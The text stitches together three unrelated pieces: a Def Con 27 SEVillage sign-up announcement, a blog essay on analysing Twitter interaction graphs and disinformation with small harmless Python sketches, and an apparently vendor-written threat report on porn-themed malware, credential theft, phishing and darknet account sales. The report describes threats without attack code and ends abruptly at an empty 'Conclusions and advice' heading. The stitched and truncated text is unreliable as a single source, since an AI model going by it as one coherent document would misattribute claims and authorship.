It's been about 6 months since Def Con 26. Yes, only 6 months. But here we are, it's 2019, and we are ready for a new round of Def Con prep! The SEVillage is entering its 10th (10th!!) year at Def Con, and we are prepared to make this more amazing than previous years have been. With over 9,000 square feet, we are going to be occupying the third floor of Bally's, in the Las Vegas Ballroom, this year at Def Con 27!
However, the SEVillage is nothing without all the people who come and make it such a fun place, especially those who sign up to speak and participate in our events. So, with that, we are happy to say that sign-ups for the SEVillage are all officially open!
Call For Papers
The SEVillage has been the home of social engineering talks for the past 5 years. The topics have ranged from interrogation techniques, hunting predators SE style, reciprocity, and so much more. We have had tools released and breakthrough research discussed. In these few short years, it has become the place for human hacking talks.
Are you interested in signing up to speak in the SEVillage? We have a CFP that is live and waiting for your submission! In the interest of allowing more people to attend the talks (without it cutting into their evening plans), we have decided this year to limit all talks to 25 minutes. When making your submission, please make sure that your talk has been tailored to that time limit.
Signups will be accepted until: May 1, 2019
The Social Engineering Capture the Flag (SECTF) has been the flagship event for the SEVillage since the beginning. Year after year, we have watched our contestants enter the booth and rock their social engineering skills. This event garners a lot of attention, and is documented by numerous news outlets.
Every year, we have people ask us, "What can I do to get selected to compete in the SECTF?" Our biggest piece of advice is to make sure you submit a video! There are hundreds who submit to compete in the SECTF each year, and the only thing that gives us a glimpse into who you are is your video. So make it entertaining, make it fun, make it unique and original! Let us see who you are and why you should be in the booth. But remember: follow the rules! Keep in mind we only have 14 slots to fill. If we haven't picked you to compete in the past, please don't be discouraged. We encourage you to submit again this year!
IMPORTANT NOTE: In the past, we have always held the SECTF on Friday and Saturday during Def Con. Over the years, we have received several concerns about the fact that it is harder to reach companies on Saturday. After some team discussion, we have decided to move the SECTF competition to Thursday and Friday. Please keep this in mind: if you are going to submit to compete in the SECTF, make sure your travel arrangements allow you to be present on August 8th and 9th.
Signups accepted until: June 1, 2019.
Videos MUST be submitted by June 15, 2019.
SECTF4Kids and SECTF4Teens
It wouldn't be the SEVillage at Def Con without the SECTF4Kids and SECTF4Teens! We're so excited to be bringing these competitions back. Every year, the young minds at Def Con prove that there is nothing you can put before them that they cannot figure out. We are planning on bringing a fun new theme this year that will challenge the kids and teens! If you are interested in signing your child up, head on over to the sign-up pages!
Signups will be accepted until: June 1, 2019.
See you soon!
We are so excited for our 10th anniversary at Def Con! We have watched the SEVillage grow from a small closet-sized room that only held the SECTF to a fully functioning village. We hope that all of you can attend and join in on the fun.
Until Vegas, stay safe!
I got into social network analysis purely for nerdy reasons – I wanted to write some code in my free time, and Python modules that wrap Twitter's API (such as tweepy) allowed me to do simple things with just a few lines of code. I started off with toy tasks (like mapping the time of day that @realDonaldTrump tweets) and then moved on to creating tools to fetch and process streaming data, which I used to visualize trends during some recent elections.
The more I work on these analyses, the more I’ve come to realize that there are layers upon layers of insights that can be derived from the data. There’s data hidden inside data – and there are many angles you can view it from, all of which highlight different phenomena. Social network data is like a living organism that changes from moment to moment.
Perhaps some pictures will help explain this better. Here's a visualization of conversations about Brexit that happened between the 3rd and 4th of December, 2018. Each dot is a user, and each line represents a reply, mention, or retweet.
Tweets supportive of the idea that the UK should leave the EU are concentrated in the orange-colored community at the top. Tweets supportive of the UK remaining in the EU are in blue. The green nodes represent conversations about UK’s Labour party, and the purple nodes reflect conversations about Scotland. Names of accounts that were mentioned more often have a larger font.
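Building such an interaction graph is straightforward. The sketch below does it with plain dictionaries over made-up tweet records; in practice the data would come from Twitter's API (e.g. via tweepy), and a tool like Gephi would handle layout and coloring:

```python
from collections import Counter

# Made-up tweet records; real ones would come from Twitter's API.
tweets = [
    {"user": "alice", "mentions": ["bob"], "retweet_of": None},
    {"user": "bob", "mentions": [], "retweet_of": "carol"},
    {"user": "alice", "mentions": ["carol"], "retweet_of": None},
]

# Each reply/mention/retweet becomes a directed, weighted edge: user -> target.
edges = Counter()
for t in tweets:
    targets = list(t["mentions"])
    if t["retweet_of"]:
        targets.append(t["retweet_of"])
    for dst in targets:
        edges[(t["user"], dst)] += 1

# In the pictures here, an account's font size scales with how often it was
# mentioned, i.e. its weighted in-degree.
mention_counts = Counter()
for (_, dst), weight in edges.items():
    mention_counts[dst] += weight

print(mention_counts.most_common())
```

Community detection and coloring (the orange/blue/green/purple clusters) would then run over this weighted edge list.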
Here’s what the conversation space looked like between the 14th and 15th of January, 2019.
Notice how the shape of the visualization has changed. Every snapshot produces a different picture that reflects the opinions, issues, and participants in that particular conversation space at the moment it was recorded. Here's one more – this time from the 20th to 21st of January, 2019.
Every interaction space is unique. Here’s a visual representation of interactions between users and hashtags on Twitter during the weekend before the Finnish presidential elections that took place in January of 2018.
And here’s a representation of conversations that happened in the InfoSec community on Twitter between the 15th and 16th of March, 2018.
I’ve been looking at Twitter data on and off for a couple of years now. My focus has been on finding scams, social engineering, disinformation, sentiment amplification, and astroturfing campaigns. Even though the data is readily available via Twitter’s API, and plenty of the analysis can be automated, oftentimes finding suspicious activity just involves blind luck – the search space is so huge that you have to be looking in the right place, at the right time, to find it. One approach is, of course, to think like the adversary. Social networks run on recommendation algorithms that can be probed and reverse engineered. Once an adversary understands how those underlying algorithms work, they’ll game them to their advantage. These tactics share many analogies with search engine optimization methodologies. One approach to countering malicious activities on these platforms is to devise experiments that simulate the way attackers work, and then design appropriate detection methods, or countermeasures against these. Ultimately, it would be beneficial to have automation that can trace suspicious activity back through time, to its source, visualize how the interactions propagated through the network, and provide relevant insights (that can be queried using natural language). Of course, we’re not there yet.
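One of the simplest automated checks in this space is flagging coordinated amplification, for instance many distinct accounts posting identical text. A toy sketch, with invented account names and tweets:

```python
from collections import defaultdict

# Toy stream of (account, tweet_text) pairs; in practice these would come
# from Twitter's streaming API. All names and texts here are made up.
stream = [
    ("acct1", "Vote now! #election"),
    ("acct2", "Vote now! #election"),
    ("acct3", "Vote now! #election"),
    ("acct4", "Had a nice lunch today"),
]

# Group accounts by the exact text they posted.
posters = defaultdict(set)
for account, text in stream:
    posters[text].add(account)

# Flag any text posted verbatim by 3+ distinct accounts as a candidate
# amplification campaign (a crude heuristic, prone to false positives).
suspicious = {text: accts for text, accts in posters.items() if len(accts) >= 3}
print(suspicious)
```

Real campaigns are subtler (paraphrased text, staggered timing), which is why such heuristics are only a starting point for manual investigation.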
The way social networks present information to users has changed over time. In the past, Twitter feeds contained a simple, sequential list of posts published by the accounts a user followed. Nowadays, Twitter feeds are made up of recommendations generated by the platform’s underlying models – what they understand about a user, and what they think the user wants to see.
A potentially dystopian outcome of social networks was outlined in a blog post written by François Chollet in May 2018, in which he describes social media becoming a "psychological panopticon".
The premise for his theory is that the algorithms that drive social network recommendation systems have access to every user’s perceptions and actions. Algorithms designed to drive user engagement are currently rather simple, but if more complex algorithms (for instance, based on reinforcement learning) were to be used to drive these systems, they may end up creating optimization loops for human behavior, in which the recommender observes the current state of each target (user) and keeps tuning the information that is fed to them, until the algorithm starts observing the opinions and behaviors it wants to see. In essence the system will attempt to optimize its users. Here are some ways these algorithms may attempt to “train” their targets:
- The algorithm may choose to only show its target content that it believes the target will engage or interact with, based on the algorithm’s notion of the target’s identity or personality. Thus, it will cause a reinforcement of certain opinions or views in the target, based on the algorithm’s own logic. (This is partially true today)
- If the target publishes a post containing a viewpoint that the algorithm doesn’t wish the target to hold, it will only share it with users who would view the post negatively. The target will, after being flamed or down-voted enough times, stop sharing such views.
- If the target publishes a post containing a viewpoint the algorithm wants the target to hold, it will only share it with users that would view the post positively. The target will, after some time, likely share more of the same views.
- The algorithm may place a target in an “information bubble” where the target only sees posts from friends that share the target’s views (that are desirable to the algorithm).
- The algorithm may notice that certain content it has shared with a target caused their opinions to shift towards a state (opinion) the algorithm deems more desirable. As such, the algorithm will continue to share similar content with the target, moving the target’s opinion further in that direction. Ultimately, the algorithm may itself be able to generate content to those ends.
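The optimization loop described in these scenarios can be caricatured in a few lines. The toy "recommender" below nudges a one-dimensional opinion toward a desired value; everything here is purely illustrative, not a model of any real system:

```python
# Toy caricature of the loop: a "recommender" observes a user's
# one-dimensional opinion and repeatedly serves content slanted toward
# the opinion it wants to see.
def simulate(user_opinion, desired=1.0, steps=50, influence=0.1):
    for _ in range(steps):
        content = desired                      # pick content matching the goal
        # The user's opinion drifts slightly toward the content consumed.
        user_opinion += influence * (content - user_opinion)
    return user_opinion

final = simulate(user_opinion=-1.0)
print(round(final, 3))  # starts at -1.0 and converges toward the desired 1.0
```

Even this trivial feedback rule converges; a reinforcement-learning recommender would learn far more targeted nudges per user, which is exactly the concern.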
Chollet goes on to mention that, although social network recommenders may start to see their users as optimization problems, a bigger threat still arises from external parties gaming those recommenders in malicious ways. The data available about users of a social network can already be used to predict when a user is suicidal or when a user will fall in love or break up with their partner, and content delivered by social networks can be used to change users' moods. We also know that this same data can be used to predict which way a user will vote in an election, and the probability of whether that user will vote or not.
If this optimization problem seems like a thing of the future, bear in mind that, at the beginning of 2019, YouTube made changes to their recommendation algorithms exactly because of problems it was causing for certain members of society. Guillaume Chaslot posted a Twitter thread in February 2019 that described how YouTube's algorithms favored recommending conspiracy theory videos, guided by the behaviors of a small group of hyper-engaged viewers. Fiction is often more engaging than fact, especially for users who spend all day, every day watching YouTube. As such, the conspiracy videos watched by this group of chronic users received high engagement, and thus were pushed up the recommendation system. Driven by these high engagement numbers, the makers of these videos created more and more content, which was, in turn, viewed by this same group of users. YouTube's recommendation system was optimized to pull more and more users into a hole of chronic YouTube addiction. Many of the users sucked into this hole have since become indoctrinated with right-wing extremist views. One such user actually became convinced that his brother was a lizard, and killed him with a sword. Chaslot has since created a tool that allows users to see which of these types of videos are being promoted by YouTube.
Social engineering campaigns run by entities such as the Internet Research Agency, Cambridge Analytica, and the far-right demonstrate that social media advert distribution platforms (such as those on Facebook) have provided a weapon for malicious actors that is incredibly powerful, and damaging to society. The disruption caused by their recent political campaigns has created divides in popular thinking and opinion that may take generations to repair. Now that the effectiveness of these social engineering techniques is apparent, I expect what we’ve seen so far is just an omen of what’s to come.
The disinformation we hear about is only a fraction of what’s actually happening. It requires a great deal of time and effort for researchers to find evidence of these campaigns. As I already noted, Twitter data is open and freely available, and yet it can still be extremely tedious to find evidence of disinformation campaigns on that platform. Facebook’s targeted ads are only seen by the users who were targeted in the first place. Unless those who were targeted come forward, it is almost impossible to determine what sort of ads were published, who they were targeted at, and what the scale of the campaign was. Although social media platforms now enforce transparency on political ads, the source of these ads must still be determined in order to understand who’s being targeted, and by what content.
Many individuals on social networks share links to “clickbait” headlines that align with their personal views or opinions (sometimes without having read the content behind the link). Fact checking is uncommon, and often difficult for people who don’t have a lot of time on their hands. As such, inaccurate or fabricated news, headlines, or “facts” propagate through social networks so quickly that even if they are later refuted, the damage is already done. This mechanism forms the very basis of malicious social media disinformation. A well-documented example of this was the UK’s “Leave” campaign that was run before the Brexit referendum. Some details of that campaign are documented in the recent Channel 4 film: “Brexit: The Uncivil War”.
It's not just the engineers of social networks who need to understand how these systems work and how they might be abused. Social networks are a relatively new form of human communication, and have only been around for a few decades. But they're part of our everyday lives, and obviously they're here to stay. Social networks are a powerful tool for spreading information and ideas, and an equally powerful weapon for social engineering, disinformation, and propaganda. As such, research into these systems should be of interest to governments, law enforcement, cyber security companies and organizations that seek to understand human communications, culture, and society.
The potential avenues of research in this field are numerous. Whilst my research with Twitter data has largely focused on graph analysis methodologies, I’ve also started experimenting with natural language processing techniques, which I feel have a great deal of potential.
We don’t yet know how much further social networks will integrate into society. Perhaps the future will end up looking like the “Majority Rule” episode of The Orville, or the “Nosedive” episode of Black Mirror, both of which depict societies in which each individual’s social “rating” determines what they can and can’t do and where a low enough rating can even lead to criminal punishment.
2018 was a year that saw campaigns to decrease online pornographic content and traffic. For example, one of the most adult-content friendly platforms – Tumblr – announced it was banning erotic content (even though almost a quarter of its users consume adult content). In addition, the UK received the title of 'The Second Most Porn-Hungry Country in the World' and is now implementing a law on age-verification for pornography lovers that will prohibit anyone below the age of 18 from watching this sort of content. This potentially opens up a world of new tricks for scammers and threat actors to take advantage of users. In addition, even commercial giant Starbucks declared a 'holy war' on porn, as it was revealed that many visitors prefer to have their coffee while consuming adult content, rather than listening to music or reading the latest headlines on news websites.
Such measures might well be valid, at least from a cybersecurity perspective, as the following example suggests. According to news reports last year, an extremely active adult website user, who turned out to be a government employee, dramatically failed to keep his hobby outside of the workplace. By accessing more than 9,000 web pages with adult content, he compromised his device and subsequently infected the entire network with malware, leaving it vulnerable to spyware attacks. This and other examples confirm that adult content remains a controversial topic from both a social and a cybersecurity standpoint.
It is no secret that digital pornography has long been associated with malware and cyberthreats. While some of these stories are now shown to be myths, others are very legitimate. A year ago, we conducted research on the malware hidden in pornography and found out that such threats are both real and effective. One of the key takeaways of last year’s report was the fact that cybercriminals not only use adult content in multiple ways – from lucrative decoys to make victims install malicious applications on their devices, to topical fraud schemes used to steal victims’ banking credentials and other personal information – but they also make money by stealing access to pornographic websites and reselling it at a cheaper price than the cost of a direct subscription.
Last year, we discovered a number of malicious samples that were specifically hunting for credentials to access some of the most popular pornographic websites. When we considered why someone would hunt for credentials to pornographic websites, we checked the underground markets (both on the dark web and on open parts of the internet) and found that credentials to pornography website accounts are themselves quite a valuable commodity to be sold online. They are for sale in their thousands.
It would be going too far to say that the findings from our previous exploration of the relationships between cyberthreats and adult content were unexpected. At the end of the day, pornography has always been, and remains one of the most sought after types of online content. At the same time, cybercriminals have always looked to increase their profits with the most efficient and cheapest way of delivering malicious payloads to victims. It was almost inevitable that adult content would become an important tool for them.
That said, our monitoring of the wider cyberthreat landscape shows that threat actors tend to change their habits, tactics and techniques over time. This means that even in a niche area, such as pornographic content and websites, changes are possible. That is why this year we decided to repeat our exercise and investigate the topic once again. As it turned out, some things have indeed changed.
Methodology and key findings
To measure the level of risk that may be associated with adult content online, we investigated several different indicators. We examined malware disguised as pornographic content, and malware that hunts for credentials to access pornography websites. We looked at the threats that are attacking users across the internet in order to find out which popular websites might be dangerous to visit. Additionally, we checked our phishing and spam database to see if there is a lot of pornographic content on file and how it is used in the wild. Using aggregated threat statistics obtained from the Kaspersky Security Network – the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world – we measured how often and how many users of our products have encountered adult-content themed threats.
Additionally, we checked around twenty underground online markets and counted how many accounts are up for sale, which are the most popular, and the price they are sold for.
As a result, we discovered the following:
- Searching for pornography online has become safer: in 2018, there were 650,000 attacks launched from online resources, 36% fewer than in 2017, when more than a million such attacks were detected.
- Cybercriminals are actively using popular porn tags to promote malware in search results. The 20 most popular tags account for 80% of all malware disguised as porn. Overall, 87,227 unique users downloaded porn-disguised malware in 2018, with 8% of them using a corporate rather than a personal network to do this.
- In 2018, the number of attacks using malware to hunt for credentials that grant access to pornography websites grew almost three-fold compared to 2017, with more than 850,000 attempts to install such malware. The number of users attacked doubled, with 110,000 attacked PCs across the world.
- The number of unique sales offers of credentials for premium accounts to adult content websites almost doubled to more than 10,000.
- Porn-themed threats increased in terms of the number of samples, but declined in terms of variety: in 2018, Kaspersky Lab identified at least 642 families of PC threats disguised under one common pornography tag. In terms of their malicious function, these families were distributed between 57 types (76 last year). In most cases, they are Trojan-Downloaders, Trojans and AdWare.
- 89% of infected files disguised as pornography on Android devices turned out to be AdWare.
- In Q4 2018, the number of attacks coming from phishing websites pretending to be popular adult content resources reached 21,902, 10 times as many as in Q4 2017.
Part 1 – Malware
As mentioned above, cybercriminals put a lot of effort into delivering malware to user devices, and pornography serves as a great vehicle for this. Most malware that reaches users' computers from malicious websites is disguised as videos. Users who do not check the file extension, and go on to download and open the file, are sent to a webpage that extorts money: the video is played online, or for free, only after the user agrees to install a malicious file disguised as a software update or something similar. However, in order to download anything from this kind of website, the user first has to find the website. That is why the most common first-stage infection scenarios for both PC and mobile porn-disguised malware involve the manipulation of search query results.
To do this, cybercriminals first identify which search requests are the most popular among users looking for pornography. They then implement so-called ‘black SEO’ techniques. This involves changing the malicious website content and description so it appears higher up on the search results pages. Such websites can be found in third or fourth place in the list of search results.
According to our findings, this method is still actively used but its efficiency is falling. To check this, we took 100 of the top listed pornographic websites (as suggested by search engines after entering a query for the word ‘porn’), plus those that have the word ‘porn’ in the title. We checked if any of them pose any threat to users. It turned out that in 2017 our products stopped more than a million users from attempting to install malware from websites on the list. However, in 2018, the number of users affected decreased to 658,930. This could be the result of search engines putting processes in place to fight against ‘black SEO’ activities and protecting users from malicious content.
Porn tags = Malware tags
Optimizing malicious websites so as to ensure that those wanting to view adult content will find them is not the only tool criminals explore in order to find the best ways of delivering infected files to victims’ devices. It turned out during our research that cybercriminals are disguising malware or not-a-virus files as video files and naming them using popular porn tags. A ‘porn tag’ is a special term that is used to easily identify content from a specific pornographic video genre. Tags are used by pornography websites to organize their video libraries and help users to quickly and conveniently find the video they are interested in. The not-a-virus type of threats is represented here by RiskTools, Downloaders and AdWare. Each type is not typically classified as malware, yet such applications may do something unwanted to users. AdWare, for instance, can show users unsolicited advertising, alter search results and collect user data to show targeted, contextual advertising.
To check how widespread this trend is, we took the most popular classifications and tags of adult videos from three major legal websites distributing adult content. The groupings were chosen by the overall number of videos uploaded in each category on the websites. As a result, we came up with a list of around 100 tags, which between them may well cover every possible type of pornography in existence. Subsequently, we ran those tags against our database of threats and through the Kaspersky Security Network databases and figured out which of them were used in malicious attacks and how often.
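The tag-matching step described above can be sketched in a few lines of code. This is a minimal illustration only, not Kaspersky’s actual tooling; the tag list and detection file names below are invented placeholders.

```python
import re

# Hypothetical tag list and detection records (invented for illustration).
porn_tags = ["amateur", "teen", "milf", "anime", "hentai"]

# Each record: the file name under which a detected threat was disguised.
detections = [
    "amateur_video_hd.mp4.exe",
    "hot_milf_clip.avi.scr",
    "holiday_photos.zip",
    "anime_special.mp4.exe",
    "amateur_compilation.wmv.exe",
]

def tags_in_name(name, tags):
    """Return the tags that appear as whole words in a file name."""
    words = set(re.split(r"[\W_]+", name.lower()))
    return [t for t in tags if t in words]

# Count how often each tag shows up in disguised-threat file names.
tag_hits = {t: 0 for t in porn_tags}
for record in detections:
    for tag in tags_in_name(record, porn_tags):
        tag_hits[tag] += 1

print({t: n for t, n in tag_hits.items() if n})  # → {'amateur': 2, 'milf': 1, 'anime': 1}
```

Running the same counting over a real detection feed would yield the per-tag attack frequencies discussed below.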
The overall number of users attacked with malware and not-a-virus threats disguised as porn-themed files dropped by about half compared to 2017. While back then their total number was 168,702, the situation in 2018 was a little more positive: down to 87,227, with 8% of them downloading porn-disguised malware from corporate networks. In this sense, scammers are merely following the overall trend: according to Pornhub’s statistics, the share of pornography viewed on desktops has dropped by 18%. However, we were not able to get full confirmation that the 2018 decrease in the number of users attacked with malicious pornography relates to changes in consumer habits.
Perhaps one of the most interesting takeaways from our analysis of how malware and not-a-virus files are distributed among porn tags is that although we were able to identify as many as 100 tags, most of the attacked users (around 80%, both in 2017 and 2018) encountered threats that mention only 20 of them. The tags used most often match the most popular tags on legitimate websites. Although we couldn’t find a perfect correlation between the most watched types of adult video on legitimate websites and the most frequently encountered porn-themed threats, the overlap between malicious and safe pornography suggests that malware and not-a-virus authors follow the trends set by the pornography-viewing community.
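The concentration described above (roughly 80% of attacked users covered by just 20 of the 100 tags) is straightforward to compute once per-tag counts are available. The sketch below uses an invented, artificially skewed distribution purely to show the calculation; the real figures came from Kaspersky Security Network.

```python
# Hypothetical per-tag counts of attacked users (invented, heavily skewed
# numbers for illustration; real data came from Kaspersky Security Network).
users_per_tag = {f"tag{i}": 1000 // i for i in range(1, 101)}

def top_share(counts, k):
    """Share of all attacked users covered by the k most common tags."""
    ranked = sorted(counts.values(), reverse=True)
    return sum(ranked[:k]) / sum(ranked)

share = top_share(users_per_tag, 20)
print(f"Top 20 tags cover {share:.0%} of attacked users")
```

With a sufficiently skewed distribution, a small head of tags dominates the total, which is the pattern the report describes.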
Moving forward, the overall picture of porn-disguised threat types showed more changes in 2018 than in 2017. In 2018, we saw 642 variations of threats disguised as famous porn tags, from 57 families. For comparison, the figures in 2017 were 581 and 76 respectively. That means that while the number of samples of porn-malware is growing, the number of types of malware and not-a-virus being distributed through pornography is decreasing.
The top three most popular classes of threats in 2018 turned out to be Trojan-Downloader, with 45% of files, Trojan, with 20%, and AdWare (not a virus), with 9%. In 2017 the top three were different: Trojan-Downloader was still there with 29%, but exploits took second place with 23%, and Trojans accounted for around 19%.
| Threat type, 2017 | Share | Threat type, 2018 | Share |
|---|---|---|---|
| Trojan-Downloader | 29% | Trojan-Downloader | 45% |
| Exploit | 23% | Trojan | 20% |
| Trojan | 19% | AdWare (not a virus) | 9% |
| AdWare (not a virus) | 11% | Worm | 8% |
| Virus | 2% | Downloader (not a virus) | 2% |
| RiskTool (not a virus) | 2% | Exploit | 2% |
| Downloader (not a virus) | 2% | Trojan-Dropper | 2% |
Top-10 types of threat that went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network
Top-10 verdicts which went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network
The most noticeable change in the overall picture is the large number of exploits in 2017: back then, they accounted for almost a quarter of all infected files, while in 2018 they did not make the top 10 at all. There is an explanation for the earlier popularity of such threats. In 2017, exploits were represented by massive detections of Exploit.Win32.CVE-2010-2568.gen, a generic detection (one that covers multiple similar malware pieces) for files that exploited the CVE-2010-2568 vulnerability in the Windows Shell. However, the same detection name applies to another LNK vulnerability, CVE-2017-8464. This vulnerability, and the publicly available exploit for it, became public in 2017 and immediately attracted a lot of interest among threat actors, driving up exploit detections. Within a year, attacks on CVE-2017-8464 decreased significantly as most users patched their computers and malware writers went back to classical malware aimed at more common file formats (such as JS, VBS and PE).
The rise in popularity of Trojan-Downloaders can be explained by the fact that such malicious programs are multipurpose: once installed on a victim’s device, the threat actor could additionally download virtually any payload they want: from DDoS-bots and malicious ads clickers to password stealers or banking Trojans. As a result, a criminal would need to infect the victim’s device only once and would then be able to use it in multiple malicious ways.
2018 also saw some changes in the share of software that is not-a-virus. All in all, such programs accounted for 15% of all threats in 2017. In 2018, however, they were on the decline and accounted for just 11%, with downloaders losing their place in the top-10 most prolific threats. So while not-a-virus software is losing ground as a porn-themed decoy, such files are increasingly carrying more harmful threats, such as Trojans and worms.
Following technical changes in how we detect and analyze mobile malware, we amended our methodology for this report. Instead of trying to identify the share of porn-themed content in the overall volume of malicious applications that our users encountered, we selected 100,000 random malicious installation packages disguised as porn videos for Android, in 2017 and 2018, and checked them against the database of popular porn tags.
The landscape for types and families of mobile threats is also different than for PC. In both 2017 and 2018, the most common type of threat was AdWare: 70% in 2017 and 89% in 2018.
Top-10 verdicts that represent porn-related categories, by the number of attacked mobile users, in 2017 and 2018. Source: Kaspersky Security Network
These threats are typically distributed through affiliate programs focused on earning money as a result of users installing applications and clicking on an advertisement. As well as AdWare, pornography is also used to distribute ransomware (4% in 2018) but on a much smaller scale compared to 2017, when more than 10% of users faced such malicious programs. This decline is most likely a reflection of the overall downward trend for ransomware seen in the malware landscape.
A specific type of malware related to pornography, which we have been tracking throughout the year, is implemented by so-called credential hunters. We track them with the help of our botnet-tracking technology, which monitors active botnets and receives intelligence on the kinds of activities they perform, in order to prevent emerging threats.
In particular, we track botnets made up of malware that, upon installation on a PC, can monitor which web pages are opened, or create a fake page where the user enters their login and password. Usually such programs are made for stealing money from online banking accounts, but last year we were surprised to discover bots in these botnets that hunt for credentials to pornography websites.
Based on the data we were able to collect, in 2017 there were 27 variations of bots, belonging to three families of banking Trojans, attempting to steal credentials (Betabot, Neverquest and Panda). These Trojans were after credentials to accounts for 10 famous adult content websites (Brazzers, Chaturbate, Pornhub, Myfreecams, Youporn, Wilshing, Motherless, XNXX, X-videos). During 2017, these bots attempted to infect more than 50,000 users over 307,000 times.
In 2018, the number of attacked users doubled, reaching more than 110,000 PCs across the world. The number of attacks almost tripled, to 850,000 infection attempts. At the same time, the number of variations of malware we were able to spot fell from 27 to 22, but the number of families increased from three to five, meaning that pornography credentials are considered valuable to ever more cybercriminals.
Another important shift in 2018 was that malware families no longer hunt for credentials to multiple websites. Instead, they focus on just two, mostly Pornhub and XNXX, whose users were targeted by bots belonging to the Jimmy malware family.
Apparently Pornhub remains popular not only with regular users of the web, but also with cybercriminals looking for another way of making illegal profits by selling user credentials.
Part 2 – Phishing and spam
Our previous research suggested that it is relatively rare to see pornography as a topic of interest in phishing scams. Instead, criminals prefer to exploit popular sites dedicated to finding sex partners. But in 2018, our anti-phishing technologies started blocking phishing pages that resemble popular pornography websites.
These are generally pages disguised as pornhub.com, youporn.com, xhamster.com, and xvideos.com. In Q4 2017, the overall number of attempts to access phishing pages pretending to be one of the listed websites was 1,608. Within a year, in Q4 2018, the number of such attempts (21,902) was more than ten times higher.
The overall number of attempts to visit phishing webpages pretending to be one of the popular adult-content resources was 38,305. Leading the list were pages disguised as Pornhub: there were 37,144 attempts to visit the phishing version of the website, against only 1,161 attempts for youporn.com, xhamster.com, and xvideos.com in total. These figures are still relatively low; other phishing categories may see detection results of millions of attempts per year. However, the fact that the number of detections on pornography pages is growing may mean that criminals are only just beginning to explore the topic.
It is worth mentioning that phishing pages cannot influence the original page in any way; they merely copy it. The authentic Pornhub page is not connected to the phishing copies. Moreover, most search engines usually block such phishing pages successfully, so the most likely way to reach them is through phishing or spam e-mails, or by being redirected there by malware or a malicious frame on another website.
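One simple heuristic that anti-phishing technologies can apply to such copycat pages is flagging domains that closely resemble, but do not exactly match, a known legitimate site. The sketch below is a toy illustration using Python’s standard difflib; the similarity threshold is an invented value, not a real product setting.

```python
from difflib import SequenceMatcher

# Legitimate domains named in the report; the threshold is an
# invented illustration value, not a real product setting.
KNOWN_BRANDS = ["pornhub.com", "youporn.com", "xhamster.com", "xvideos.com"]
THRESHOLD = 0.85

def lookalike_of(domain, brands=KNOWN_BRANDS, threshold=THRESHOLD):
    """Return the brand a domain imitates, or None if it is exact or unrelated."""
    for brand in brands:
        if domain == brand:
            return None  # the real site, not a fake
        if SequenceMatcher(None, domain, brand).ratio() >= threshold:
            return brand
    return None

print(lookalike_of("p0rnhub.com"))   # → pornhub.com
print(lookalike_of("example.com"))   # → None
```

Real anti-phishing engines combine many more signals (URL reputation, page content, certificates), but string similarity against known brands is one common building block.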
Fake versions of popular pornography websites target users’ credentials and contact details, which can later be either sold or used in other fraud schemes or cyberattacks. In general, credential capture is one of the most popular ways of targeting users with pornography-themed phishing schemes. In such schemes, the victim is often lured to a phishing website disguised as a social network, where they are asked to authenticate their identity in order to watch an adult video that can only be accessed if the user confirms they are over 18 years old.
As the victim enters their password, the threat actor captures the credentials to the user’s social network account.
Pornographic content phishing can also be used to install malicious software. For example, to access an alleged adult video, the phishing page requires the user to download and update a video player.
Needless to say, instead of downloading a video player, the user downloads malware.
Sometimes phishing fraudsters target e-wallet credentials with the help of pornographic content. The victim is lured to the pornographic website to watch a video broadcast. In order to view the content, the user is asked to enter their payment credentials.
We have rarely seen pornographic content used in any special or specific way when it comes to spam. Apart from the mass distribution of ‘standard’ advertising offering adult content on legitimate and illegal websites, this type of threat hasn’t been spotted using pornography in a creative way. However, there is one exception. Beginning in 2017, an infamous sextortion scam emerged: users began receiving messages containing an extortion letter demanding that they transfer bitcoins to the fraudsters.
The scammers claimed to have personal messages and recordings of the victim watching porn. The letters even claimed that the threat actor could combine the video that the supposed victim was watching with what was recorded through their webcam. This extortion is based purely on making threats.
2018, however, saw an increase in the volume of such e-mails. Moreover, they became more sophisticated: they not only threatened the user, but also ‘proved’ the legitimacy of the scammers’ claims by providing the user with actual information about them.
In most cases, it was either a password, or a phone number, or a combination of both with an e-mail address. Since people tend to use the same passwords for different websites, the victim was often likely to believe that paired passwords and e-mail addresses found by the criminal on the dark web were authentic, even if they were not actually correct for the adult-content account in question.
Furthermore, these e-mails have been sent out in more languages than previously found.
In reality, these mailings were based purely on bluff: the assumption that enough recipients would believe the claims and pay up to make the scheme profitable. The number of such scams grew in 2018.
Part 3 – Darknet insights
One of the burning topics of the adult-content industry is the controversy surrounding paid subscriptions. Users can often register for pornography accounts through a ‘premium’ subscription model (with no advertisements and unlimited access to the adult website’s content). Otherwise, the website does not let them watch any content for free at all; at most, the user may see video previews but is still expected to pay to watch the full video. Opinions on this practice vary. Some people claim that money paid for porn “directly fuels the industry that supports the abuse, exploitation, and trafficking around the world”. Others argue that pornography is like most other commodities, and that people are willing to exchange money for it just as they would for other kinds of entertainment, such as TV series or music. Some, though, prefer to highlight examples of when adult content can result in people being denied their human rights.
Whether it is worth it or not, some users agree that the price of premium accounts to popular pornography websites is rather high. For example, monthly memberships can vary from $20 to $30, and annual unlimited access can cost from $120 to $150. This is where cybercriminals enter the fray.
Our previous research on porn-related cyberthreats showed that there is a very well developed supply and demand chain for stolen credentials on the dark web. We investigated this issue again in 2018, analyzing 20 of the top-rated Tor marketplaces listed on DeepDotWeb, an open Tor site that contains a dynamic ranking of dark markets evaluated by Tor administrators based on customers’ feedback. Each of them contained between one and more than 3,000 offers for credentials to adult content websites. In total, 29 websites displayed more than 15,000 offers to buy one or more accounts to pornography websites (with, of course, no guarantee of delivering on their promise).
Last year’s research showed that the four markets offering the widest range of stolen credentials carried more than 5,239 unique offers between them. In 2018, that number doubled to more than 10,000 offers on sale.
The quantity of accounts per offer ranged from 1 to 30, with a few exceptions mostly from poorly rated sellers; the majority of offers promised credentials to only one account. Regardless of the type of account, prices vary from $3 to $9 per offer, very rarely exceeding $10 (the same as back in 2017), with the vast majority limited to $6-$7 or the equivalent amount in bitcoins. That is 20 times cheaper than the most modest annual membership. Getting access to an account illegally for less than the cost of a legal subscription is not the only appeal of buying such credentials on the dark web: there is the added appeal of anonymity, hiding behind other people’s credentials while watching pornography.
Conclusions and advice
